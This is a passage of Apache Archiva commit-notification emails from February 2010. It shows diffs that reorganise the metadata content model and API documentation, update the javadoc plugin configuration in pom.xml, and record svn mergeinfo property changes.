(Postfix, from userid 65534) id 40E0723889DE; Thu, 11 Feb 2010 13:28:01 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r908960 - in /archiva/branches/MRM-1025/archiva-modules: metadata/content-model.txt src/site/apt/metadata.apt Date: Thu, 11 Feb 2010 13:27:59 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: brett Date: Thu Feb 11 13:27:56 2010 New Revision: 908960 URL: http://svn.apache.org/viewvc?rev=908960&view=rev Log: further migrate metadata documentation Removed: archiva/branches/MRM-1025/archiva-modules/metadata/content-model.txt Modified: archiva/branches/MRM-1025/archiva-modules/src/site/apt/metadata.apt Modified: archiva/branches/MRM-1025/archiva-modules/src/site/apt/metadata.apt URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/src/site/apt/metadata.apt?rev=908960&r1=908959&r2=908960&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/src/site/apt/metadata.apt (original) +++ archiva/branches/MRM-1025/archiva-modules/src/site/apt/metadata.apt Thu Feb 11 13:27:56 2010 @@ -12,6 +12,9 @@ * Content Model + The content model is designed such that it models the most likely structure of the data both for storage and + retrieval. For example, audit logs are stored by the time they occur, not grouped under an action. + The following is a sample tree that represents the content model: ---- @@ -172,13 +175,23 @@ the structure above), and nodes can have properties and values (shown as <<<property=value>>> above). <Note:> Some of the properties have been put in place temporarily but need to be revisited - for example the use - of index counters for the lists of Maven POM information are not ideal. + of index counters for the lists of Maven POM information are not ideal, and some Maven specific aspects of + the dependencies should become faceted content The following sections walk through parts of the tree. ** Configuration section - ... + <Note:> The configuration section is not currently implemented in the code. It should be shadowed to a file on the + file system for easy editing and pre-configuration outside the server. A possible implementation is to use + the same storage and resolution mechanism to access the configuration so that this can be achieved, and it + can be loaded on the fly, etc. + + It is desirable to be able to access and modify all configuration through the same interfaces, so it is also stored + in the content repository. + + Each repository will have it's own metadata, but there also needs to be a server-level configuration for other parts + of the system. ** Content section @@ -186,8 +199,7 @@ {{{./terminology.html} Terminology}} document, artifacts are described by the following coordinates (with the values shown from the example above): - * Namespace (<<<org.apache.archiva.platform>>>) - namespaces are of arbitrary depth, and are project namespaces, - not to be confused with JCR's item/node namespaces + * Namespace (<<<org.apache.archiva.platform>>>) * Project ID (<<<scanner>>>) @@ -197,13 +209,27 @@ [] + Namespaces are of arbitrary depth, and are project namespaces, not to be confused with JCR's item/node namespaces. + A separate namespace and project identifier are retained to allow '.' in the project identifier without splitting, + while still allowing splitting on '.' in the namespace, when determining the most appropriate path for an artifact + in the content repository. The namespace may be null if there isn't one. + + Projects are very simple entities. They do not have subprojects - if such modeling needs to be done, then we + would create a "products" tree (or similar) that will map what "Archiva 1.0" contains as a collection of project + version nodes, for example. + Each artifact in the repository will contain an entry, though not necessarily every file. For example, in a Maven repository it is known that the <<<.md5>>>, <<<.sha1>>> and <<<.asc>>> files represent metadata about the artifact of the same name, so that is attached to that node instead. Metadata is stored at the level most appropriate to that piece of information. This means that in a Maven repository, while both the POM and other artifact(s) are considered be separate artifacts, they all share the - information in the POM that is stored at the project version or even project level. + information in the POM that is stored at the project version or even project level. We only keep one set of project + information for a version - this differs from Maven's storage of one POM per snapshot. The Maven 2 module will take + the latest snapshot data and use that. Those that need Maven's behaviour should retrieve the POM directly. + + Note that artifact data is not stored in the metadata repository (there is no data= property on the file). The + information here is enough to locate the file in the original storage when it is requested. The following describes some of the metadata at each level. Note that the Maven extensions are covered here - these are optional, and they wouldn't be present on a non-Maven storage repository. Likewise, plugins may store @@ -219,9 +245,9 @@ *** Project Version Metadata - * <<<created>>> - when the artifact was added to the repository + * <<<created>>> - when the metadata was added to the repository (see [1] below) - * <<<updated>>> - when the artifact was last updated + * <<<updated>>> - when the metadata was last updated (see [1] below) * <<<name>>> - human-readable project name @@ -258,8 +284,73 @@ * <<<maven:properties.*>>> - properties stored in a Maven POM + [] + + Footnotes: + + [[1]] created/updated timestamps may be maintained by the metadata repository implementation for the metadata + itself. Timestamps for individual files are stored as additional properties (<<<fileCreated>>>, + <<<fileLastModified>>>). It may make sense to add a "discovered" timestamp if an artifact is known to be + created at a different time to which it is added to the metadata repository. + +** Facets Section + + The facets section allows storage of other repository metadata for specific plugins. Each is named by the plugin's + unique identifier. + +*** Audit Logs (<<<org.apache.archiva.audit>>>) + + Audit logs are stored hierarchically by name, breaking down the date until getting to the timestamp of a particular + event. The event details are stored as properties of that node. Presently filtering by an action or other field + would require querying the content repository. + + * <<<action>>> - the action that was taken, such as uploading an artifact + + * <<<artifact.*>>> - the co-ordinates of the artifact affected + + * <<<remoteIP>>> - the IP address of the person executing the action, if applicable + + * <<<user>>> - the user affecting the action, if applicable + + [] + + A future possibility is to store audit metadata on artifacts themselves (who uploaded, when, and how), or whether it + was discovered by scanning. While this duplicates some information, it would reduce the need to query by a certain + artifact ID and the nodes could be lined referentially. + + Audit metadata may also need to be extended to other nodes such as configuration. In this case, it may make sense + to alter the artifact reference to a content repository path instead, or to utilise a native mechanism of the + content repository. + +*** Repository Statistics (<<<org.apache.archiva.metadata.repository.stats>>>) + + Like audit logs, repository statistics are stored by timestamp, marking the time a scan started. The results are + stored as properties of the scan: + + * <<<scanStartTime>>>, <<<scanEndTime>>> - when the scan ran from and until + + * <<<total*>>> - the statistics gathered about certain totals in the repository + + [] + + The current approach of tying statistics to the scanning process is not optimal, as it cannot be 'live'. We may + later determine if any of the stats can be derived by functions of the content repository rather than storing and + trying to keep them up to date. Historical data might be retained by versioning and taking a snapshot at a given + point in time. + +*** Problem Reports (<<<org.apache.archiva.reports>>>) + + While not shown above, the problem reporting plugin similarly stores a facet of information, recording particular + issues noticed in the repository such as invalid Maven POMs, etc. + +** References Section + + The references section contains information about references to a given artifact. It is the inverse of the + dependency relationship. + + References are stored outside the main model so that their creation doesn't imply a "stub" model - we know if the + project exists whether a reference is created or not. References need not infer referential integrity. - ~~ information about it (notes to convert) ~~ Java API @@ -267,3 +358,8 @@ ~~ persistence + ~~ properties with '.' may be nested in other representations such as Java models or XML, if appropriate + + ~~ while some information is stored at the most generic level in the metadata repository (eg maven:groupId, + maven:artifactId), for convenience when loaded by the implementation it may all be pushed into the projectVersion's + information. The metadata repository implementation can decide how best to store and retrieve the information. From [email protected] Thu Feb 11 15:05:33 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 17043 invoked from network); 11 Feb 2010 15:05:33 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Feb 2010 15:05:33 -0000 Received: (qmail 41663 invoked by uid 500); 11 Feb 2010 15:05:33 -0000 Delivered-To: [email protected] Received: (qmail 41606 invoked by uid 500); 11 Feb 2010 15:05:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 41596 invoked by uid 99); 11 Feb 2010 15:05:33 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 11 Feb 2010 15:05:33 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 11 Feb 2010 15:05:31 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 8652C2388900; Thu, 11 Feb 2010 15:05:10 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r909014 - /archiva/branches/MRM-1025/archiva-modules/pom.xml Date: Thu, 11 Feb 2010 15:05:09 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: brett Date: Thu Feb 11 15:05:08 2010 New Revision: 909014 URL: http://svn.apache.org/viewvc?rev=909014&view=rev Log: make javadoc work properly for -links and -tag Modified: archiva/branches/MRM-1025/archiva-modules/pom.xml Modified: archiva/branches/MRM-1025/archiva-modules/pom.xml URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/pom.xml?rev=909014&r1=909013&r2=909014&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/pom.xml (original) +++ archiva/branches/MRM-1025/archiva-modules/pom.xml Thu Feb 11 15:05:08 2010 @@ -101,10 +101,10 @@ </plugin> <plugin> <artifactId>maven-javadoc-plugin</artifactId> - <version>2.4</version> + <version>2.6.1</version> <configuration> <source>1.5</source> - <aggregate>true</aggregate> + <useStandardDocletOptions>true</useStandardDocletOptions> <doclet>gr.spinellis.umlgraph.doclet.UmlGraphDoc</doclet> <docletArtifact> <groupId>gr.spinellis</groupId> @@ -118,8 +118,6 @@ -nodefontpackagesize 7 </additionalparam> <links> - <link>http://java.sun.com/j2se/1.4.2/docs/api</link> - <link>http://java.sun.com/j2ee/1.4/docs/api</link> <link>http://java.sun.com/j2se/1.5.0/docs/api</link> <link>http://commons.apache.org/collections/apidocs-COLLECTIONS_3_0/</link> <link>http://commons.apache.org/dbcp/apidocs/</link> @@ -132,15 +130,38 @@ <link>http://jakarta.apache.org/regexp/apidocs/</link> <link>http://velocity.apache.org/engine/releases/velocity-1.5/apidocs/</link> </links> + <tags> + <tag> + <name>plexus.component</name> + <placement>t</placement> + <head>Component definition:</head> + </tag> + <tag> + <name>plexus.configuration</name> + <placement>f</placement> + <head>Configuration:</head> + </tag> + <tag> + <name>plexus.requirement</name> + <placement>f</placement> + <head>Requirement:</head> + </tag> + <tag> + <name>todo</name> + <placement>a</placement> + <head>To Do:</head> + </tag> + </tags> </configuration> <reportSets> <reportSet> <reports> <!-- Don't need tests --> - <report>javadoc</report> + <report>aggregate</report> </reports> </reportSet> </reportSets> + <inherited>false</inherited> </plugin> <!-- TODO: choose appropriate rulesets <plugin> From [email protected] Thu Feb 11 15:24:30 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 23249 invoked from network); 11 Feb 2010 15:24:30 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Feb 2010 15:24:30 -0000 Received: (qmail 74410 invoked by uid 500); 11 Feb 2010 15:24:30 -0000 Delivered-To: [email protected] Received: (qmail 74350 invoked by uid 500); 11 Feb 2010 15:24:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 74341 invoked by uid 99); 11 Feb 2010 15:24:30 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 11 Feb 2010 15:24:30 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 11 Feb 2010 15:24:27 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id E959A23888E2; Thu, 11 Feb 2010 15:23:57 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r909022 - in /archiva/branches/MRM-1025/archiva-modules/src/site: apt/index.apt.vm apt/metadata-api.apt apt/metadata-content-model.apt apt/metadata.apt apt/repositories.apt apt/repository-api.apt site.xml Date: Thu, 11 Feb 2010 15:23:56 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: brett Date: Thu Feb 11 15:23:51 2010 New Revision: 909022 URL: http://svn.apache.org/viewvc?rev=909022&view=rev Log: re-arrange docs and write up metadata repository Added: archiva/branches/MRM-1025/archiva-modules/src/site/apt/metadata-api.apt archiva/branches/MRM-1025/archiva-modules/src/site/apt/metadata-content-model.apt - copied, changed from r908960, archiva/branches/MRM-1025/archiva-modules/src/site/apt/metadata.apt archiva/branches/MRM-1025/archiva-modules/src/site/apt/repository-api.apt - copied, changed from r908848, archiva/branches/MRM-1025/archiva-modules/src/site/apt/repositories.apt Removed: archiva/branches/MRM-1025/archiva-modules/src/site/apt/metadata.apt archiva/branches/MRM-1025/archiva-modules/src/site/apt/repositories.apt Modified: archiva/branches/MRM-1025/archiva-modules/src/site/apt/index.apt.vm archiva/branches/MRM-1025/archiva-modules/src/site/site.xml Modified: archiva/branches/MRM-1025/archiva-modules/src/site/apt/index.apt.vm URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/src/site/apt/index.apt.vm?rev=909022&r1=909021&r2=909022&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/src/site/apt/index.apt.vm (original) +++ archiva/branches/MRM-1025/archiva-modules/src/site/apt/index.apt.vm Thu Feb 11 15:23:51 2010 @@ -62,9 +62,11 @@ * {{{./terminology.html} Terminology}} - * {{{./metadata.html} Repository metadata}} + * {{{./metadata-content-model.html} Repository metadata content model}} - * {{{./repositories.html} Repository APIs}} + * {{{./metadata-api.html} Repository metadata API and persistence}} + + * {{{./repository-api.html} Repository APIs}} * More Information Added: archiva/branches/MRM-1025/archiva-modules/src/site/apt/metadata-api.apt URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/src/site/apt/metadata-api.apt?rev=909022&view=auto ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/src/site/apt/metadata-api.apt (added) +++ archiva/branches/MRM-1025/archiva-modules/src/site/apt/metadata-api.apt Thu Feb 11 15:23:51 2010 @@ -0,0 +1,46 @@ + ---- + Metadata API + ---- + +Metadata API and Persistence + + The Metadata Java API is comprised of the following: + + * The Java model + + * The Metadata repository API + + * The plugins for storing the metadata repository content + +* Metadata Models + + The Java model is a very simply representation of the metadata. Presently the following are represented: + + * {{{./apidocs/org/apache/archiva/metadata/model/MetadataFacet.html} repository metadata facets}} + + * {{{./apidocs/org/apache/archiva/metadata/model/ProjectMetadata.html} project metadata}} + + * {{{./apidocs/org/apache/archiva/metadata/model/ProjectVersionMetadata.html} project version metadata}} + + * various subtypes + + More information can be found in the + {{{./apidocs/org/apache/archiva/metadata/model/package-summary.html} org.apache.archiva.metadata.model}} package, + or the {{{./metadata/metadata-model/index.html} metadata-model}} module. + +* Metadata Repository API + + The metadata repository API is responsible for accessing the metadata repository and persisting changes. This is + handled by the {{{./apidocs/org/apache/archiva/metadata/repository/MetadataRepository.html} MetadataRepository}} + class. + + More information can be found in the {{{./metadata/metadata-repository-api/index.html} metadata-repository-api}} + module. + +* Persistence + + Currently, the only implementation of persistence for the metadata content is a flat-file option using Java + properties. The code is note yet production quality. You can find out more in the: + {{{./apidocs/org/apache/archiva/metadata/repository/file/FileMetadataRepository.html} FileMetadataRepository}} + class. + Copied: archiva/branches/MRM-1025/archiva-modules/src/site/apt/metadata-content-model.apt (from r908960, archiva/branches/MRM-1025/archiva-modules/src/site/apt/metadata.apt) URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/src/site/apt/metadata-content-model.apt?p2=archiva/branches/MRM-1025/archiva-modules/src/site/apt/metadata-content-model.apt&p1=archiva/branches/MRM-1025/archiva-modules/src/site/apt/metadata.apt&r1=908960&r2=909022&rev=909022&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/src/site/apt/metadata.apt (original) +++ archiva/branches/MRM-1025/archiva-modules/src/site/apt/metadata-content-model.apt Thu Feb 11 15:23:51 2010 @@ -1,20 +1,17 @@ ---- - Metadata Repository + Metadata Control Model ---- -Metadata Repository +Metadata Content Model The metadata repository stores all known information about a repository in a common format that other plugins can understand, and that eventually external applications will be able to query. - Dealing with metadata repositories covers two aspects: the content model, and the content repository access API - (and persistence). - -* Content Model - The content model is designed such that it models the most likely structure of the data both for storage and retrieval. For example, audit logs are stored by the time they occur, not grouped under an action. +* Content Model Structure + The following is a sample tree that represents the content model: ---- @@ -174,6 +171,14 @@ This uses a typical content repository structure, where there is a path to a particular node (the last paths in the structure above), and nodes can have properties and values (shown as <<<property=value>>> above). + Properties with '.' may be nested in other representations such as Java models or XML, if appropriate - this is + the decision of the content repository persistence implementation. + + Additionally, while some information is stored at the most generic level in the metadata repository (eg + <<<maven:groupId>>>, <<<maven:artifactId>>>), for convenience when loaded by the implementation it may all be pushed + into the project version's information. The metadata repository implementation can decide how best to store and + retrieve the information. + <Note:> Some of the properties have been put in place temporarily but need to be revisited - for example the use of index counters for the lists of Maven POM information are not ideal, and some Maven specific aspects of the dependencies should become faceted content @@ -351,15 +356,3 @@ References are stored outside the main model so that their creation doesn't imply a "stub" model - we know if the project exists whether a reference is created or not. References need not infer referential integrity. - - ~~ Java API - - ~~ access - - ~~ persistence - - ~~ properties with '.' may be nested in other representations such as Java models or XML, if appropriate - - ~~ while some information is stored at the most generic level in the metadata repository (eg maven:groupId, - maven:artifactId), for convenience when loaded by the implementation it may all be pushed into the projectVersion's - information. The metadata repository implementation can decide how best to store and retrieve the information. Copied: archiva/branches/MRM-1025/archiva-modules/src/site/apt/repository-api.apt (from r908848, archiva/branches/MRM-1025/archiva-modules/src/site/apt/repositories.apt) URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/src/site/apt/repository-api.apt?p2=archiva/branches/MRM-1025/archiva-modules/src/site/apt/repository-api.apt&p1=archiva/branches/MRM-1025/archiva-modules/src/site/apt/repositories.apt&r1=908848&r2=909022&rev=909022&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/src/site/apt/repositories.apt (original) +++ archiva/branches/MRM-1025/archiva-modules/src/site/apt/repository-api.apt Thu Feb 11 15:23:51 2010 @@ -0,0 +1,6 @@ + ---- + Repository APIs + ---- + +Repository APIs + Modified: archiva/branches/MRM-1025/archiva-modules/src/site/site.xml URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/src/site/site.xml?rev=909022&r1=909021&r2=909022&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/src/site/site.xml (original) +++ archiva/branches/MRM-1025/archiva-modules/src/site/site.xml Thu Feb 11 15:23:51 2010 @@ -34,8 +34,9 @@ <menu name="Developers"> <item name="Overview" href="/index.html" /> <item name="Terminology" href="/terminology.html" /> - <item name="Metadata" href="/metadata.html" /> - <item name="Repositories" href="/repositories.html" /> + <item name="Metadata Control Model" href="/metadata-content-model.html" /> + <item name="Metadata API" href="/metadata-api.html" /> + <item name="Repository API" href="/repository-api.html" /> </menu> <menu ref="modules" /> </body> From [email protected] Thu Feb 11 16:43:22 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 57625 invoked from network); 11 Feb 2010 16:43:21 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Feb 2010 16:43:21 -0000 Received: (qmail 57343 invoked by uid 500); 11 Feb 2010 16:43:21 -0000 Delivered-To: [email protected] Received: (qmail 57283 invoked by uid 500); 11 Feb 2010 16:43:21 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 57273 invoked by uid 99); 11 Feb 2010 16:43:21 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 11 Feb 2010 16:43:21 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 11 Feb 2010 16:43:19 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 9B8642388994; Thu, 11 Feb 2010 16:42:58 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r909067 - /archiva/branches/MRM-1025/archiva-modules/src/site/apt/repository-api.apt Date: Thu, 11 Feb 2010 16:42:54 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: brett Date: Thu Feb 11 16:42:44 2010 New Revision: 909067 URL: http://svn.apache.org/viewvc?rev=909067&view=rev Log: some more information Modified: archiva/branches/MRM-1025/archiva-modules/src/site/apt/repository-api.apt Modified: archiva/branches/MRM-1025/archiva-modules/src/site/apt/repository-api.apt URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/src/site/apt/repository-api.apt?rev=909067&r1=909066&r2=909067&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/src/site/apt/repository-api.apt (original) +++ archiva/branches/MRM-1025/archiva-modules/src/site/apt/repository-api.apt Thu Feb 11 16:42:44 2010 @@ -4,3 +4,30 @@ Repository APIs + The repository APIs are the means for accessing metadata from any type of repository. + + <Note:> currently, only metadata retrieval is available. As more of the application moves to this base, artifact + content may be read using a stream, for example. + +* Metadata Resolver + + A repository request works in the following sequence: + + [[1]] the user requests a project's metadata using a + {{{./apidocs/org/apache/archiva/metadata/repository/MetadataResolver.html} MetadataResolver}} + + [[2]] the resolvers are chained together to locate the source of the metadata, and to determine where the most + up to date copy is. Included by default are the metadata repository and repository storage + + [[3]] the metadata is retrieved, and if not up to date in the metadata repository it is stored there + + [[4]] the metadata is returned to the requester + +* Storage Resolver + + Currently storage only supports obtaining information as well. In the future, the ability to modify the storage + will be made available for plugins such as purging, etc. + + More information can be found in the + {{{./apidocs/org/apache/archiva/metadata/repository/storage/StorageMetadataResolver.html} storage metadata resolver}} + class. From [email protected] Fri Feb 12 01:43:51 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41491 invoked from network); 12 Feb 2010 01:43:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Feb 2010 01:43:51 -0000 Received: (qmail 43066 invoked by uid 500); 12 Feb 2010 01:43:50 -0000 Delivered-To: [email protected] Received: (qmail 43035 invoked by uid 500); 12 Feb 2010 01:43:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 43026 invoked by uid 99); 12 Feb 2010 01:43:50 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 01:43:50 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 01:43:47 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id BCEC223889F1; Fri, 12 Feb 2010 01:43:27 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r909202 [2/4] - in /archiva/branches/MRM-1025: ./ archiva-docs/src/site/apt/adminguide/ archiva-docs/src/site/resources/images/tour/ archiva-docs/src/site/xdoc/tour/ archiva-modules/archiva-base/archiva-consumers/archiva-consumer-api/src/ma... Date: Fri, 12 Feb 2010 01:43:25 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/archiva-test.xml ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/archiva-test.xml:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/archiva-test.xml:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/archiva-test.xml:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/archiva-test.xml:825850-899477 +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/archiva-test.xml:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org:825850-882054,882055-899477* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org:825850-882054,882055-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache:825850-882054,882055-899477* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache:825850-882054,882055-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva:825850-882054,882055-899477* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva:825850-882054,882055-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler:825850-882054,882055-899477* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler:825850-882054,882055-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler/repository/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler/repository:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler/repository:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler/repository:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler/repository:825850-882054,882055-899477* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler/repository:825850-882054,882055-909070* Propchange: 